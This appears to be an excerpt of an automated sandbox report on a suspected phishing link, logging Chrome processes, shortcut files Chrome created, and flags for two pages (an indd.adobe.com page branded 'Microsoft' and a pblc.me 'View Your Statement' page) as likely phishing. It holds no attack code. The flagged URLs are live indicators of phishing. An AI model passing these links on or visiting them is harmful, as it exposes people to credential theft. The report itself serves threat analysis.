Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6596 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6596 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: Google Drive.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected

Persistence and Installation Behavior

barindex
Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 LLM: Page with brand: 'Microsoft' contains button: 'Click to Access Document' Source: '2.4.pages.csv'
Source: https://pblc.me/pub/40f029dddc28e3 LLM: Page with brand: '' contains button: 'View Your Statement' Source: '10.9.pages.csv'
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs